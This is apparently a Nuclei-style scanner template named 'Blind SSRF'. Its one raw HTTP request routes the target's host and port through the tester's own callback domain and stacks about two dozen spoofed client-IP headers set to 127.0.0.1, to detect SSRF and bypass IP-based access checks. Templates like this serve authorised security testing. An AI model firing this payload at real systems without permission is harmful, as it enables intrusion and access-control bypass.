id: 0x137

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
    - |+
      GET {{Scheme}}://{{Host}}.{{Port}}.BSSRF-137.{{MY-DOMAIN}}/ HTTP/1.0
      X-Forwarded-For: 127.0.0.1
      X-Forwarded-Host: 127.0.0.1
      X-Forwarded: 127.0.0.1
      Forwarded-For: 127.0.0.1
      Forwarded: for=127.0.0.1;by=127.0.0.1;host=127.0.0.1
      X-Remote-IP: 127.0.0.1
      X-Remote-Addr: 127.0.0.1
      True-Client-IP: 127.0.0.1
      Client-IP: 127.0.0.1
      X-Client-IP: 127.0.0.1
      X-Cluster-Client-IP: 127.0.0.1
      WL-Proxy-Client-IP: 127.0.0.1
      Proxy-Client-IP: 127.0.0.1
      Fastly-Client-Ip: 127.0.0.1
      True-Client-Ip: 127.0.0.1
      X-Real-IP: 127.0.0.1
      X-Originating-IP: 127.0.0.1
      Ali-CDN-Real-IP: 127.0.0.1
      Cdn-Src-Ip: 127.0.0.1
      Cdn-Real-Ip: 127.0.0.1
      CF-Connecting-IP: 127.0.0.1
      X-Host: 127.0.0.1
      X-Custom-IP-Authorization: 127.0.0.1
      Cache-Control: no-transform
      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
      Accept-Encoding: gzip, deflate
      Accept: */*
      
    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"